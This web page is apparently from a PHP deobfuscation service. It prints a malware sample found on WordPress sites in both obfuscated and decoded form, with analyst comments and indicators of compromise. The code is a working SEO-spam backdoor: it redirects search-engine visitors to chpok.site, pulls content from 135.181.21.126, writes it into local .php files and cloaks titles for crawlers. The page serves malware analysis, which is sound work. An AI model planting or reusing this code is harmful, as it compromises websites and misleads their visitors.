
PHP 難読化コードの復元・デコード

WordPress 等で見つかる PHP のマルウェア・ウィルス・改ざんコードをオンラインでデコードして難読化を解除し、
元の読みやすいコードに戻して解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto nDH9Y; TuFxJ: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\x52\105\122"], "\147\x6f\157\147\x6c\145\x2e") or strpos($_SERVER["\x48\124\x54\120\x5f\122\x45\x46\105\x52\x45\122"], "\x79\x61\150\157\157\x2e") or strpos($_SERVER["\110\124\x54\x50\137\122\x45\x46\x45\122\x45\x5...



難読化されたPHPコード

<?php
 goto nDH9Y; TuFxJ: if (strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\x52\105\122"], "\147\x6f\157\147\x6c\145\x2e") or strpos($_SERVER["\x48\124\x54\120\x5f\122\x45\x46\105\x52\x45\122"], "\x79\x61\150\157\157\x2e") or strpos($_SERVER["\110\124\x54\x50\137\122\x45\x46\x45\122\x45\x52"], "\142\x69\x6e\x67\x2e")) { header("\114\157\x63\x61\164\x69\157\x6e\x3a\x20\x68\164\164\160\163\x3a\x2f\x2f\x63\x68\160\x6f\x6b\56\x73\151\164\x65\57\145\x6e\x74\x65\162\x2f\x3f\x6d\141\x72\x6b\75{$today}\x2d{$s}\x26\145\156\147\x6b\145\171\75{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\56\160\x68\x70"; if (file_exists("\x69\156\x64\x65\x78\57" . $myname)) { $html = @file_get_contents("\x69\x6e\x64\145\170\57" . $myname); if (strpos($_SERVER["\110\x54\124\x50\x5f\125\123\105\x52\137\x41\107\105\x4e\x54"], "\x62\x69\x6e\x67") > 2 or strpos($_SERVER["\x48\x54\124\x50\137\125\123\105\x52\137\101\107\x45\116\124"], "\171\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); $html = str_replace("\74\164\151\x74\x6c\145\76\x3c\57\164\x69\x74\x6c\145\76", "\x3c\164\x69\164\x6c\x65\x3e{$keyword}\74\x2f\164\151\x74\154\x65\x3e", $html); } echo $html; die; } } goto B2_32; FZvU7: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto qbgBf; y8n61: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\x70\x3a\57\57\61\63\x35\56\61\x38\61\56\x32\x31\x2e\61\62\66\57" . $_GET["\146\156"] . "\x2e\x70\150\x70\77\160\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); } goto fKCoR; bS7r8: if (function_exists("\143\165\162\x6c\x5f\151\x6e\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\x3a\x2f\57\61\x33\x35\x2e\x31\70\61\x2e\62\x31\56\61\x32\66\57" . $_GET["\x66\156"] . 
"\x2e\160\150\x70\x3f\160\x61\163\163\x3d{$apass}\x26\x71\75{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\172\x69\154\154\141\57\x34\x2e\x30\x20\50\x63\157\x6d\160\141\164\x69\x62\154\x65\x3b\40\x4d\123\x49\105\x20\66\x2e\x30\x3b\x20\127\151\156\x64\157\x77\163\40\x4e\124\x20\65\56\x31\x3b\x20\x53\x56\61\x29"); $text = curl_exec($ch); curl_close($ch); } goto y8n61; AvdnR: foreach ($_GET as $a => $b) { $_GET["\x69\144"] = $b; } goto fW72h; lexF0: $xx1 = 5; goto Y7QO1; oy0xm: $s = dirname($_SERVER["\120\110\x50\137\123\x45\x4c\106"]); goto FZvU7; GfAOQ: $_GET["\x77\x6f\x72\154\144"] = 5; goto LV51I; LV51I: $_GET["\146\156"] = "\x36\x39\x36\71\x36\71\156\x65\x77"; goto Bp7Sb; fRKlP: if (strpos($_SERVER["\x48\x54\x54\120\137\125\x53\105\122\137\x41\107\105\116\124"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\x48\x54\x54\x50\137\125\123\x45\x52\137\x41\107\105\116\x54"], "\x79\x61\x68\x6f\157") > 2) { $text = str_replace("\74\164\151\x74\x6c\145\76\x3c\57\164\151\164\154\x65\76", "\x3c\164\x69\164\x6c\x65\x3e{$keyword}\74\x2f\x74\151\x74\x6c\145\76", $text); } goto b4mZv; z7AiE: $keyword = str_replace("\40", "\53", $keyword); goto slWS2; B2_32: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\151\x64"]); goto WyuOn; Y7QO1: $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); goto z7AiE; fKCoR: if (strlen($text) < 5000) { $url = "\x31\x33\x35\x2e\x31\70\x31\x2e\62\61\x2e\61\62\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\x3c\x62\162\x20\x2f\76\xa"; } else { $req = "\x2f" . $_GET["\146\x6e"] . 
"\x2e\x70\150\160\77\x70\141\163\x73\x3d{$apass}\x26\x71\75{$_GET["\x69\x64"]}"; $out = "\x47\105\124\40{$req}\40\x48\x54\124\120\x2f\x31\56\60\15\12"; $out .= "\x48\x6f\x73\164\72\40{$url}\15\xa"; $out .= "\x43\x6f\x6e\x6e\x65\x63\164\151\157\x6e\72\x20\x43\154\x6f\163\145\xd\xa\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto eK1wp; Bp7Sb: $apass1 = "\x76\151\x73\144\157\x69\152\x65\167"; goto d5LYx; nDH9Y: error_reporting(0); goto NeqgM; fW72h: if ($_GET["\x69\144"] == "\x74\145\x73\x74\151\x6e\x67") { echo "\164\x65\163\164\40\147\157\x6f\x64\x2e\56\56"; die; } goto OHNXi; d5LYx: $x1 = 3; goto lexF0; b4mZv: echo $text; goto j6wVa; NeqgM: $today = "\62\x30\62\x34\x30\x34\x30\x39\x2d"; goto AvdnR; qbgBf: $s = $_SERVER["\x53\105\x52\x56\105\122\x5f\x4e\x41\x4d\105"] . $s; goto Y2VMI; eK1wp: if (strlen($text) > 5000) { $out = fopen("\x69\x6e\x64\x65\x78\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto fRKlP; Y2VMI: $apass3 = "\x72\166\x33\62\x79\144\141\143\163\166\163\x64\166"; goto BgS_V; OHNXi: if ($_GET["\x69\144"] == "\151\156\144\x65\x78") { header("\x4c\x6f\x63\141\164\151\157\156\x3a\x20\x68\x74\x74\x70\x73\72\57\x2f\x67\x6f\x6f\x67\154\145\56\143\157\x6d"); die; } goto GfAOQ; BgS_V: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto TuFxJ; WyuOn: $text = ''; goto bS7r8; slWS2: $apass2 = "\142\62\63\x68\x72\62\x33\166\x72\63\x32"; goto oy0xm; j6wVa: ?>

デコード(難読化解除)されたコード

<?php

// Analyst notes (review comments only; the decoded code below is unchanged).
// What the visible code does:
//   * silences PHP error reporting;
//   * redirects visitors whose Referer contains "google.", "yahoo." or "bing."
//     to chpok.site, passing a date tag, this site's host/path and a keyword;
//   * for all other requests, serves a page cached as index/<id>.php, or fetches
//     one from http://135.181.21.126/ (cURL, then file_get_contents, then a raw
//     socket) and caches it when the response is longer than 5000 bytes;
//   * fills an empty <title></title> with the keyword when the User-Agent
//     contains "bing" or "yahoo".
// Indicators visible in this listing: host 135.181.21.126, domain chpok.site,
// remote script name "696969new", a local "index/" directory holding *.php
// files, and the literal reply "test good..." for id=testing.
error_reporting(0);
// Fixed date-like tag; it is only used in the redirect URL's "mark" parameter.
$today = "20240409-";
// Every query parameter overwrites $_GET["id"], so the value of the LAST
// parameter becomes the id, whatever that parameter is called.
foreach ($_GET as $a => $b) {
    $_GET["id"] = $b;
}
// Fixed reply for id=testing, before any other logic runs.
// NOTE(review): looks like a liveness check for the operator - inferred.
if ($_GET["id"] == "testing") {
    echo "test good...";
    die;
}
// id=index is bounced to google.com instead of being served.
if ($_GET["id"] == "index") {
    header("Location: https://google.com");
    die;
}
// "fn" is set to a constant AFTER the loop above, so a request-supplied "fn"
// never reaches the remote URL. "world", $x1 and $xx1 are not read again in
// this listing.
$_GET["world"] = 5;
$_GET["fn"] = "696969new";
$apass1 = "visdoijew";
$x1 = 3;
$xx1 = 5;
// Keyword derived from id: "-" becomes " ", then " " becomes "+".
$keyword = str_replace("-", " ", $_GET["id"]);
$keyword = str_replace(" ", "+", $keyword);
$apass2 = "b23hr23vr32";
// $s ends up as SERVER_NAME plus the script's directory (empty for the web root).
// The "|" is a bitwise OR of the two comparison results, which acts as a
// logical OR here.
$s = dirname($_SERVER["PHP_SELF"]);
if ($s == "\\" | $s == "/") {
    $s = '';
}
$s = $_SERVER["SERVER_NAME"] . $s;
$apass3 = "rv32ydacsvsdv";
// $apass is the three fragments joined; it is sent as the "pass" query
// parameter of every remote fetch below. The obfuscated original on this page
// interpolates {$apass3} here; the decoder has inlined the literal.
$apass = "{$apass1}" . "{$apass2}" . "rv32ydacsvsdv";
// Referer gate: strpos() is used as a truth value, so a match at offset 0
// counts as "not found"; any later match triggers the redirect.
if (strpos($_SERVER["HTTP_REFERER"], "google.") or strpos($_SERVER["HTTP_REFERER"], "yahoo.") or strpos($_SERVER["HTTP_REFERER"], "bing.")) {
    // $today already ends in "-", so "mark" contains a double dash before the
    // host/path of the compromised site.
    header("Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}");
    die;
} else {
    // id comes straight from the request and is not validated before it is
    // used in a filesystem path (here and in the cache write further down).
    $myname = $_GET["id"] . ".php";
    if (file_exists("index/" . $myname)) {
        // The cached file is read and echoed as text, not include()d;
        // "@" hides a read failure.
        $html = @file_get_contents("index/" . $myname);
        // "> 2" means the substring was found at offset 3 or later.
        if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) {
            $keyword = str_replace("-", " ", $_GET["id"]);
            $html = str_replace("<title></title>", "<title>{$keyword}</title>", $html);
        }
        echo $html;
        die;
    }
}
// $query_pars_2 is not read again in this listing.
$query_pars_2 = str_replace("-", "+", $_GET["id"]);
$text = '';
// Fetch attempt 1: cURL to the hard-coded host, sending the pass string and
// the raw id as query parameters.
if (function_exists("curl_init")) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
    // Certificate verification is switched off; the URL above is plain http,
    // so the request is unencrypted in any case.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    // Fixed MSIE 6.0 User-Agent string on the outbound request.
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
    $text = curl_exec($ch);
    curl_close($ch);
}
// Fetch attempt 2: a response shorter than 5000 bytes is treated as a failure
// and the same URL is retried through the http:// stream wrapper.
if (strlen($text) < 5000) {
    $text = file_get_contents("http://135.181.21.126/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}");
}
// Fetch attempt 3: hand-written HTTP/1.0 request over a raw socket to port 80.
if (strlen($text) < 5000) {
    $url = "135.181.21.126";
    $fp = fsockopen($url, 80, $errno, $errstr, 30);
    if (!$fp) {
        // The connection error is echoed into the page.
        echo "{$errstr} ({$errno})<br />\n";
    } else {
        $req = "/" . $_GET["fn"] . ".php?pass={$apass}&q={$_GET["id"]}";
        $out = "GET {$req} HTTP/1.0\r\n";
        // The obfuscated original interpolates {$url} here; the decoder has
        // inlined it.
        $out .= "Host: 135.181.21.126\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        // Reads the whole response, status line and headers included.
        while (!feof($fp)) {
            $text .= fgets($fp, 2048);
        }
        fclose($fp);
    }
    // $out is the request string (or unset when the connection failed), not a
    // stream, so this fclose() call is a defect in the sample.
    // NOTE(review): the outcome (suppressed warning vs. fatal TypeError)
    // depends on the PHP version - confirm on the affected host.
    fclose($out);
    // Keeps only the eighth line (index 7) of the raw response, which assumes
    // a fixed number of header lines in front of the body.
    $text = explode("\n", $text);
    $text = $text[7];
}
// Cache write: a response longer than 5000 bytes is saved under index/ with a
// .php name, without any inspection of its content.
// NOTE(review): whether these files run as PHP when requested directly depends
// on the web server configuration, which this listing does not show.
if (strlen($text) > 5000) {
    $out = fopen("index/" . $myname, "w");
    fwrite($out, $text);
    fclose($out);
}
// Same title substitution as on the cached path, using the "+"-joined keyword.
if (strpos($_SERVER["HTTP_USER_AGENT"], "bing") > 2 or strpos($_SERVER["HTTP_USER_AGENT"], "yahoo") > 2) {
    $text = str_replace("<title></title>", "<title>{$keyword}</title>", $text);
}
// The fetched content is sent to the client as-is.
echo $text;

